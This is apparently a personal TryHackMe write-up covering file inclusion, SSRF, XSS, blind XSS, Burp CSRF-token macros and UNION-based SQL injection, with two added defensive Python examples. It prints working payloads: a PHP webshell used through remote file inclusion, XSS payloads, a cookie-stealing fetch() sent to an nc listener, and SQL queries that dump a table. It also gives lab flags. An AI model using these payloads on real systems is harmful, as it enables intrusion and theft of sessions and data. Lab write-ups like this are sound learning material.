# web vulnerable

[TOC]

###### tags: `tryhackme` `web`

# File Inclusion

![](https://i.imgur.com/VBoA7yl.png)

Tampering with the cookie -> admin

```
curl 'http://10.10.188.128/challenges/chall2.php?file=/etc/flag2' -H 'Cookie: THM=admins'
```

![](https://i.imgur.com/g4e8Ba9.png)

The script restricts the include to a specific directory, so here I try path traversal to bypass it.

![](https://i.imgur.com/ZKVwoTD.png)

```
Cookie: THM=../../../../etc/flag2%00
```

![](https://i.imgur.com/0D2Da8w.png)

## Capture Flag3 at /etc/flag3

GET request -> the slashes are deleted by the script, so switch to a POST request.

![](https://i.imgur.com/8WC9Vt9.png)

---

Gain RCE in **Lab #Playground** /playground.php with RFI to execute the hostname command. What is the output?

## python3 -m http.server

```
<?php echo exec('hostname');?>
```

![](https://i.imgur.com/VHWuGEE.png)

![](https://i.imgur.com/QDaGzEC.png)

![](https://i.imgur.com/ktyTjpw.png)

```
<?php print exec($_REQUEST["cmd"]); ?>
```

```
http://10.10.82.106/playground.php?file=http://10.10.23.100:8000/webshell.php&cmd=cat /proc/version
```

# SSRF

## What is the flag from the /private directory?

## Info

1. **/private**, which gives us an error message explaining that the contents cannot be viewed from our IP address.
2. **/customers/new-account-page**, with a new feature allowing customers to choose an avatar for their account.

Step 1: create an account to log in and view [https://10-10-135-212.p.thmlabs.com/customers/new-account-page](https://10-10-135-212.p.thmlabs.com/customers/new-account-page)

Ctrl+Shift+C

![](https://i.imgur.com/TzRDMrr.png)

![](https://i.imgur.com/Q2tzA3z.png)

Choose one of the avatars and then click the **Update Avatar** button.

![](https://i.imgur.com/V0ZR5UO.png)

Try to use the SSRF vulnerability to request the /private page.

![](https://i.imgur.com/nA2LJBT.png)

Result

![](https://i.imgur.com/lJaiMfF.png)

Here there is probably a rule preventing our request forgery.
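As an added defensive example (not code from the write-up or the TryHackMe lab): one Python path check that covers both tricks on this page, the traversal-plus-`%00` cookie used against the include above, and a deny-rule on `/private` that only compares the raw string and so lets a traversal segment such as `x/../private` through. The include directory, the deny list and the shape of the lab's own rule are assumptions.

```python
# Added example, not from the write-up or the TryHackMe lab: a single path check that
# covers both the LFI cookie "../../../../etc/flag2%00" and an SSRF deny-rule on
# /private that would otherwise be bypassed by a traversal segment (x/../private).
import posixpath
from typing import Optional
from urllib.parse import unquote

INCLUDE_ROOT = "/var/www/includes"  # assumed directory the include must stay inside
DENIED_PREFIXES = ("/private",)     # assumed internal paths the avatar fetch may not reach


def decode(value: str) -> Optional[str]:
    """Undo (possibly repeated) percent-encoding; refuse NUL bytes outright."""
    decoded = value
    for _ in range(3):  # %252e -> %2e -> . : decode until the value stops changing
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return None if "\x00" in decoded else decoded  # %00 is the extension-truncation trick


def include_allowed(file_param: str) -> bool:
    """LFI check: resolve ".." first, then require the result to stay under INCLUDE_ROOT."""
    decoded = decode(file_param)
    if decoded is None:
        return False
    # join() discards INCLUDE_ROOT when decoded is absolute, so "/etc/flag2" is rejected too
    resolved = posixpath.normpath(posixpath.join(INCLUDE_ROOT, decoded))
    return resolved.startswith(INCLUDE_ROOT + "/")


def naive_fetch_allowed(url_path: str) -> bool:
    """Raw-string comparison, the kind of rule the lab presumably applies (assumption)."""
    return not url_path.lstrip("/").startswith("private")


def fetch_path_allowed(url_path: str) -> bool:
    """SSRF check: normalise the path before comparing it with the deny list."""
    decoded = decode(url_path)
    if decoded is None:
        return False
    resolved = posixpath.normpath("/" + decoded.lstrip("/"))
    return not any(resolved == p or resolved.startswith(p + "/") for p in DENIED_PREFIXES)


if __name__ == "__main__":
    for value in ("pages/about.php", "/etc/flag2", "../../../../etc/flag2%00"):
        print(f"include {value!r}: {include_allowed(value)}")
    for value in ("meowhecker", "meowhecker/../private", "%252e%252e/private"):
        print(f"fetch {value!r}: naive={naive_fetch_allowed(value)} strict={fetch_path_allowed(value)}")
```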
## Bypass

We use the path traversal trick: value='meowhecker/../private'

![](https://i.imgur.com/yNs1yit.png)

[https://www.asciitohex.com/](https://www.asciitohex.com/)

THM{YOU_WORKED_OUT_THE_SSRF}

# XSS payload

## Level 1

Proof:

```
<script>alert(document.cookie)</script>
```

## Level 2

```
"><svg onload=alert("document.cookie")<!--
```

## Level 3

```
</textarea><svg onload=alert("document.cookie")>
```

## Level 4

```
';alert('document.cookie')//
```

![](https://i.imgur.com/XzFGD8t.png)

## Level 5

### Method 1

```
<svg onload=alert('document.cookie')>
```

![](https://i.imgur.com/2nrrs06.png)

### Method 2

```
<sscriptcript>alert('document.cookie')</sscriptcript>
```

## Level 6

```
meow" onerror="alert('THM')
```

**THM{XSS_MASTER}**

## Bypass

```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
```

They probably use various tools to generate this code.

`javascript:` is a way of embedding JavaScript code in a web page.

---

# XSS Blind

###### tags: `meowhecker` `xss` `blind` `tryhackme`

Click on the **Customers** tab on the top navigation bar and click the "**Signup here**" link to create an account. Once your account gets set up, click the **Support Tickets** tab, which is the feature we will investigate for weaknesses.
![](https://i.imgur.com/4xMy6ug.png)

```
meow</textarea><svg onload=alert(document.cookie)>
```

Hacker server:

```
nc -nlvp 6699
```

- `-n`: don't do DNS resolution
- `-l`: listen
- `-v`: verbose
- `-p`: specify the port

Attack payload:

```
</textarea><svg onload=fetch('http://10.10.164.43:6699?cookie='+btoa(document.cookie))></svg><!--
```

# Burp Suite

## CSRF token bypass

###### tags: `meowhecker` `burp suite` `token bypass`

Needs more practice.

## Target

http://10.10.56.212/admin/login/

![](https://i.imgur.com/ogmBXiM.png)

### Response

![](https://i.imgur.com/sFTppbb.png)

![](https://i.imgur.com/sa1hDTz.png)

---

Intruder:

- username -> wordlist
- password -> wordlist
- loginToken -> macro
- session -> macro

## Login token (key, without the account and password)

![](https://i.imgur.com/L7HjOD2.png)

![](https://i.imgur.com/zkLlaQM.png)

## Build a macro

Macros are a set of instructions in the information security field. They are usually used in applications or computer systems to automate repetitive tasks or operations. In information security, macros are usually used to check whether a system is secure, or to automate defence against attacks.

Macros allow us to perform the same set of actions repeatedly. In this case, we simply want to send a GET request to `/admin/login/`.

"Project Options" -> "Sessions"

![](https://i.imgur.com/x5VupXH.png)

---

![](https://i.imgur.com/6ypWsMb.png)

---

![](https://i.imgur.com/nDf74yB.png)

---

![](https://i.imgur.com/TgId1Ec.png)

---

![](https://i.imgur.com/QXDQAoY.png)

---

![](https://i.imgur.com/9OWJqs2.png)

The macro will now overwrite all of the parameters in our Intruder requests before we send them.

---

![](https://i.imgur.com/cLbPA4x.png)

Now we have a macro defined that will substitute in the CSRF token and session cookie.
![](https://i.imgur.com/vK3ziY3.png)

![](https://i.imgur.com/TXOybQs.png)

# SQLi with Repeater

###### tags: `tryhackme` `web`

## Proof

```
http://10.10.238.248/about/1'
```

![](https://i.imgur.com/deK4Yx1.png)

## Proxy -> Repeater

Ctrl+R, then Ctrl+Shift+R

```
1 or 1=1
```

![](https://i.imgur.com/tByL2aq.png)

## Build a payload

```
1 union select null,null,null,null,null
```

### Find the column names

```
GET /about/-1 union select "meowhecker",column_name,null,null,null from information_schema.columns where table_name="people"
```

![](https://i.imgur.com/TiPJVz5.png)

---

### Enumerate all columns

```
GET /about/-1 union select "meowhecker",group_concat(column_name),null,null,null from information_schema.columns where table_name="people"
```

![](https://i.imgur.com/ZmlkYqw.png)

Columns:

```
id,firstName,lastName,pfpLink,role,shortRole,bio,notes
```

Retrieve data:

```
GET /about/-1 union select null,null,null,null,concat(id,firstName,lastName,pfpLink,role,shortRole,bio,notes) from people
```

![](https://i.imgur.com/TRMvqvM.png)
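As an added example (not code from the write-up or the lab), the `/about/<id>` lookup rebuilt in Python against an in-memory SQLite table with the column names enumerated above: once with string concatenation, which is the defect the `1 or 1=1` and UNION requests exploit, and once parameterised, where the same input matches nothing. The sample rows are constructed, and SQLite spells `concat` as `||`.

```python
# Added example, not from the write-up: the vulnerable /about/<id> query beside its
# parameterised form, run against constructed sample data in SQLite.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's people table (same column names as above)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE people (id INTEGER, firstName TEXT, lastName TEXT, pfpLink TEXT,"
        " role TEXT, shortRole TEXT, bio TEXT, notes TEXT)"
    )
    conn.executemany(
        "INSERT INTO people VALUES (?,?,?,?,?,?,?,?)",
        [
            (1, "Ada", "Lovelace", "/img/1.png", "Engineer", "eng", "bio1", "note-1"),
            (2, "Alan", "Turing", "/img/2.png", "Director", "dir", "bio2", "note-2"),
        ],
    )
    return conn


def about_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    """The URL value is pasted into the SQL text, so OR / UNION clauses become part of it."""
    query = f"SELECT id,firstName,lastName,pfpLink,role FROM people WHERE id = {raw_id}"
    return conn.execute(query).fetchall()


def about_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    """The driver binds the value: the whole string is compared to id and matches nothing."""
    query = "SELECT id,firstName,lastName,pfpLink,role FROM people WHERE id = ?"
    return conn.execute(query, (raw_id,)).fetchall()


# Same shape as the write-up's last request; the base query has five columns, so the
# UNION half must too, and the fifth column carries the concatenated row.
PAYLOAD = "-1 union select null,null,null,null,(id||firstName||lastName||notes) from people"

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 or 1=1", PAYLOAD):
        print(f"{value!r}\n  concatenated: {about_vulnerable(db, value)}")
        print(f"  parameterised: {about_safe(db, value)}")
```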